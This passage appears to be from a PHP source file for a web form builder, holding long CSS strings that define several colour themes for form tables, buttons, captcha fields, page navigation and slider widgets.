!important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color: #fff !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 1px solid  #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\npadding: 0 4px;\nmargin:0 0 3px;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder-radius:0px;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px;\r\nborder:1px solid #CCC;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder-radius:0px;\r\nborder:1px solid #ABADB3;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#FFF000;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #818181;\r\nmargin-right:3px !important;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #818181;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\nmargin:5px 7px;\r\nborder:1px solid #FFFFFF;\r\nborder:1px solid #ABADB3;\r\npadding:1px;\r\n}\r\n",
      "11" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, wdform_table1{\n		border:inherit !important;\n		padding:inherit;\n		margin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\ntable.wdform_table1 {\nborder-collapse: initial !important;\n}\n.wdform_footer td{\ntext-align:center !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n .wdform_table1 tbody{\n	 border-collapse:inherit !important;\n }\n.wdform_table2{\n	width:initial;\n}\n .page_numbers{\n	vertical-align:middle !important;\n}\n .wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	margin:inherit !important;\n	border-collapse:inherit !important;\n	padding:inherit !important\n}\n.wdform_table1 tr{\n	margin:inherit !important;\n}\n.wdform_table2 table{\n		width: inherit !important;\n		background-color:inherit !important;\n}\n.file_upload{\n		font-size:12px !important;\n}\n.wdform_table1 button\n{\n		background-image:none !important;\n}\n.calendar, .calendar tr, .calendar td, .calendar table{\n		border-collapse:inherit;\n		padding:inherit;\n		margin:inherit;\n}\n.button, .button_reset, .button_submit{\n		padding-bottom:inherit !important;\n		padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n		text-align:left;\n		vertical-align:middle;\n		border:none !important;\n		padding:inherit  !important;\n		margin-bottom: inherit !important;\n		margin-top: inherit !important;\n}\n .wdform_table2 tr{\n	vertical-align:top !important;\n	text-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n		color:#000;\n		line-height:1 !important;\n		margin-bottom:2px !important;\n		margin-top:2px !important;\n		font-size:inherit !important;\n		display:inline !important;\n   padding-left:inherit;\n		padding-right:inherit;\n}\n.wdform_table1 input{\n	padding-bottom:2px !important;\n	padding-top:2px !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 10px !important;\nborder: 2px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#FF832B !important;\nborder:1px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_input input {\nborder-radius: 0px !important;\nborder-width: 1px !important;\npadding: 1px !important;\nmargin: 1px !important;\nheight: 16px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_select select \n{\nborder-radius: 0px !important;\npadding: 1px !important;\nmargin: 1px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.time_box\n{\nborder-width:1px !important;\nheight:16px !important;\nmargin: 1px !important;\npadding: 1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload {\nborder: 0px solid white !important;\nborder-radius: 0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor: black !important;\nbackground-color: white !important;\n} \n.page_deactive\n{\ncolor:#ffffff !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#FF832B !important;\n}\n.page_active\n{\ncolor:#000000 !important;\nfont-weight:bold !important;\nborder: 3px double black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#ffffff !important;\nbox-shadow: 0px 0px 0px 0px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:20px !important;\nline-height:20px !important;\nbackground-color:#FF832B !important;\nborder-radius: 0em 4em 1em 0em !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: inset -5px 1px 10px 1px #ACB8A6 !important;\n}\n.page_percentage_deactive\n{\nheight:20px !important;\nline-height:20px !important;\nborder:1px solid black !important;\nbackground-color:#ffffff !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:5px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color: #000000 !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000 !important;\nborder: 0px solid  #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\npadding: 0 4px;\nmargin:0 0 3px;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder-radius:0px !important;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#A31919;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #FFFFFF;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #FFFFFF;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n}\r\n\r\n\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\nmargin:5px 7px;\r\nborder:1px solid #FFFFFF;\r\npadding:1px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "12" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, wdform_table1{\n		border:inherit !important;\n		padding:inherit;\n		margin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\ntable.wdform_table1 {\nborder-collapse: initial !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_footer td{\ntext-align:center !important;\n}\n.wdform_table2{\n	width:initial;\n}\n .wdform_table1 tbody{\n	 border-collapse:inherit !important;\n }\n .page_numbers{\n	vertical-align:middle !important;\n}\n .wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	margin:inherit !important;\n	border-collapse:inherit !important;\n	padding:inherit !important\n}\n.wdform_table1 tr{\n	margin:inherit !important;\n}\n.wdform_table2 table{\n		width: inherit !important;\n		background-color:inherit !important;\n}\n.file_upload{\n		font-size:12px !important;\n}\n.wdform_table1 button\n{\n		background-image:none !important;\n}\n.calendar, .calendar tr, .calendar td, .calendar table{\n		border-collapse:inherit;\n		padding:inherit;\n		margin:inherit;\n}\n.button, .button_reset, .button_submit{\n		padding-bottom:inherit !important;\n		padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n		text-align:left;\n		vertical-align:middle;\n		border:none !important;\n		padding:inherit  !important;\n		margin-bottom: inherit !important;\n		margin-top: inherit !important;\n}\n .wdform_table2 tr{\n	vertical-align:top !important;\n	text-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n		color:#000;\n		line-height:1 !important;\n		margin-bottom:2px !important;\n		margin-top:2px !important;\n		font-size:inherit !important; \n		display:inline !important;\n   padding-left:inherit;\n		padding-right:inherit;\n}\n.wdform_table1 input{\n	padding-bottom:2px !important;\n	padding-top:2px !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1\n{\nfont-size:14px !important; \nfont-weight:normal !important; \ncolor:#000000 !important; \nborder-spacing: 10px !important; \nborder: 2px solid black !important; \nwidth: 100% !important; \n}\n.wdform_tbody1\n{\nbackground-color:#FFF000 !important; \nborder:1px solid black !important; \ntext-align:center !important; \nborder-radius:0px !important; \nfloat:left !important; \nwidth: 100% !important; \n}\n.wdform_tr1\n{\nvertical-align:top !important; \nwidth:100% !important; \n}\n.wdform_table2\n{\npadding-right:0px  !important; \npadding-left:30px  !important; \nfloat:left !important; \nborder-spacing: 2px !important; \nborder-collapse:separate  !important; \n}\n.wdform_tr_section_break td\n{\npadding-right:20px  !important; \npadding-left:20px  !important; \nwidth:100% !important; \n}\n.wdform_input input {\nborder-radius: 0px !important; \nborder-width: 1px !important; \npadding: 1px !important; \nmargin: 1px !important; \nheight: 16px !important; \n}\n.wdform_address input\n{\nborder-radius:0px !important; \nheight:16px !important; \nfont-size:12px !important; \n}\n.wdform_address select\n{\nborder-radius:0px !important; \nheight:21px !important; \nfont-size:12px !important; \n}\n.wdform_date_fields select\n{\nborder-radius:0px !important; \nheight:21px !important; \nfont-size:12px !important; \npadding:1px !important; \nmargin:1px !important; \n}\n.wdform_select select \n{\nborder-radius: 0px !important; \npadding: 1px !important; \nmargin: 1px !important; \n}\n.wdform_date_fields input\n{\nborder-radius:0px !important; \nborder-width: 1px !important; \nheight:16px !important; \nfont-size:12px !important; \npadding:1px !important; \nmargin:1px !important; \n}\n.time_box\n{\nborder-width:1px !important; \nheight:16px !important; \nmargin: 1px !important; \npadding: 1px !important; \ntext-align:right !important; \nwidth:30px !important; \nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important; \nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important; \ncolor:#000 !important; \n}\n.ch_rad_label\n{\ndisplay:inline !important; \nmargin-left:5px !important; \nmargin-right:15px !important; \nfloat:none !important; \ncolor:#000 !important; \n}\n.label\n{\nborder:none !important; \ncolor:#000 !important; \n}\n.wdform_colon\n{\ncolor:#000\n}\n.wdform_separator\n{\nfont-style:bold !important; \nvertical-align:middle !important; \ncolor:#000 !important; \n}\n.wdform_line\n{\ncolor:#000\n}\n.td_am_pm_select\n{\npadding-left:5 !important; \n}\n.am_pm_select\n{\nheight:21px !important; \nfont-size:12px !important; \npadding:1px !important; \nmargin:1px !important; \n}\n.input_deactive\n{\ncolor:#999999 !important; \nfont-style:italic !important; \nborder-width:1px !important; \nmargin: 1px !important; \npadding: 1px !important; \nborder-radius:0px !important; \nheight:16px; \n}\n.input_active\n{\ncolor:#000000 !important; \nfont-style:normal !important; \nborder-width:1px !important; \nmargin: 1px !important; \npadding: 1px !important; \nborder-radius:0px !important; \nheight:16px; \n}\n.required\n{\nborder:none !important; \ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important; \nmargin: 0px !important; \npadding: 0px !important; \ncursor:pointer !important; \n}\n.captcha_refresh\n{\nwidth:30px !important; \nheight:30px !important; \nborder-width:0px !important; \nmargin: 0px !important; \npadding: 0px !important; \nvertical-align:middle !important; \ncursor:pointer !important; \nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important; \n}\n.captcha_input\n{\nheight:20px !important; \nborder-width:1px !important; \nmargin: 0px !important; \npadding: 0px !important; \nvertical-align:middle !important; \n}\n.file_upload {\nborder: 0px solid white !important; \nborder-radius: 0px !important; \nmargin: 0px !important; \npadding: 0px !important; \ncolor: black !important; \nbackground-color: white !important; \n} \n.page_deactive\n{\ncolor:#000 !important; \nborder: 1px solid black !important; \npadding:4px 7px 4px 7px !important; \nmargin:4px !important; \ncursor:pointer !important; \nbackground-color:#FFF000 !important; \n}\n.page_active\n{\ncolor:#000000 !important; \nfont-weight:bold !important; \nborder: 3px double black !important; \npadding:4px 7px 4px 7px !important; \nmargin:4px !important; \ncursor:pointer !important; \nbackground-color:#ffffff !important; \nbox-shadow: 0px 0px 0px 0px black !important; \n}\n.page_percentage_active\n{\npadding:0px !important; \nmargin:0px !important; \nborder-spacing: 0px !important; \nheight:20px !important; \nline-height:20px !important; \nbackground-color:#FFF000 !important; \nborder-radius: 0em 4em 1em 0em !important; \nfont-size:15px !important; \nfloat:left !important; \ntext-align: right  !important;  \nbox-shadow: inset -5px 1px 10px 1px #ACB8A6 !important; \n}\n.page_percentage_deactive\n{\nheight:20px !important; \nline-height:20px !important; \nborder:1px solid black !important; \nbackground-color:#ffffff !important; \nborder-radius:0px !important; \ntext-align: left  !important;  \npadding:5px !important; \n}\n.page_numbers\n{\nfont-size:11px !important; \ncolor:#000 !important; \n}\n.phone_area_code\n{\nwidth:50px !important; \n}\n.phone_number\n{\nwidth:100px !important; \n}\n.button_submit\n{\ncursor: pointer !important; \nfont-size: 15px !important; \nfont-weight: bold !important; \nborder-radius: 0px !important; \nmin-width: 80px !important; \nmin-height: 30px !important; \ncolor: white !important; \nbackground-color:#F53E04 !important; \nborder: 0px solid #ffffff !important; \nmargin: 5px !important; \nbox-shadow: 0px 0px 0px #000000 !important; \n}\n.button_reset\n{\ncursor: pointer !important; \nfont-size: 15px !important; \nfont-weight: bold !important; \nborder-radius: 0px !important; \nmin-width: 80px !important; \nmin-height: 30px !important; \ncolor: white !important; \nbackground-color:#F53E04 !important; \nborder: 0px solid #ffffff !important; \nmargin: 5px !important; \nbox-shadow: 0px 0px 0px #000000 !important; \n}\n.wdform_button button \n{\ncursor: pointer !important; \nfont-size: 15px !important; \nfont-weight: bold !important; \nborder-radius: 0px !important; \nmin-width: 80px !important; \nmin-height: 30px !important; \ncolor: white !important; \nbackground-color: #F53E04 !important; \nborder: 0px solid #ffffff !important; \nmargin: 5px !important; \nbox-shadow: 0px 0px 0px #000000 !important; \n}\n.other_input\n{\nborder-radius:0px !important; \nborder-width: 1px !important; \nheight:16px !important; \nfont-size:12px !important; \npadding:1px !important; \nmargin:1px !important; \nmargin-left: 25px !important; \n}\nbutton.wdform_page_button\n{\ncursor: pointer !important; \nfont-size: 15px !important; \nfont-weight: bold !important; \nborder-radius: 0px !important; \nmin-width:80px !important; \nmin-height: 30px !important; \ncolor: white !important; \nbackground-color:#F53E04 !important; \nborder: 0px solid  #ffffff !important; \nmargin: 5px !important; \nbox-shadow: 0px 0px 0px #000000 !important; \n}\nspan.wdform_page_button\n{\ncolor:#000 !important; \nfont-size: 15px !important; \nfont-weight: bold !important; \nmargin: 5px !important; \ncursor:pointer !important; \n}\n.wdform_page_navigation\n{\ntext-align:center  !important; \nmargin-bottom:10px !important; \n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important; \ncolor:#000000 !important; \nfont-weight:bold !important; \n}\n.wdform_percentage_title\n{\ncolor:#000000 !important; \nfont-style:italic !important; \nmargin: 0px 0px 0px 30px !important; \n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\npadding: 0 4px;\nmargin:0 0 3px;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#778F1D;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #FFFFFF;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #FFFFFF;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n}\r\n\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\nmargin:5px 7px;\r\nborder:1px solid #FFFFFF;\r\nborder:1px solid #84857D;\r\npadding:1px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "13" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, wdform_table1{\n		border:inherit !important;\n		padding:inherit;\n		margin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\ntable.wdform_table1 {\nborder-collapse: initial !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_footer td{\ntext-align:center !important;\n}\n.wdform_table2{\n	width:initial;\n}\n .wdform_table1 tbody{\n	 border-collapse:inherit !important;\n }\n .page_numbers{\n	vertical-align:middle !important;\n}\n .wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	margin:inherit !important;\n	border-collapse:inherit !important;\n	padding:inherit !important\n}\n.wdform_table1 tr{\n	margin:inherit !important;\n}\n.wdform_table2 table{\n		width: inherit !important;\n		background-color:inherit !important;\n}\n.file_upload{\n		font-size:12px !important;\n}\n.wdform_table1 button\n{\n		background-image:none !important;\n}\n.calendar, .calendar tr, .calendar td, .calendar table{\n		border-collapse:inherit;\n		padding:inherit;\n		margin:inherit;\n}\n.button, .button_reset, .button_submit{\n		padding-bottom:inherit !important;\n		padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n		text-align:left;\n		vertical-align:middle;\n		border:none !important;\n		padding:inherit  !important;\n		margin-bottom: inherit !important;\n		margin-top: inherit !important;\n}\n .wdform_table2 tr{\n	vertical-align:top !important;\n	text-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n		color:#000;\n		line-height:1 !important;\n		margin-bottom:2px !important;\n		margin-top:2px !important;\n		font-size:inherit !important; \n		display:inline !important;\n   padding-left:inherit;\n		padding-right:inherit;\n}\n.wdform_table1 input{\n	padding-bottom:2px !important;\n	padding-top:2px !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 10px !important;\nborder: 2px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#A31919 !important;\nborder:1px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_input input {\nborder-radius: 0px !important;\nborder-width: 1px !important;\npadding: 1px !important;\nmargin: 1px !important;\nheight: 16px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_select select \n{\nborder-radius: 0px !important;\npadding: 1px !important;\nmargin: 1px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.time_box\n{\nborder-width:1px !important;\nheight:16px !important;\nmargin: 1px !important;\npadding: 1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle 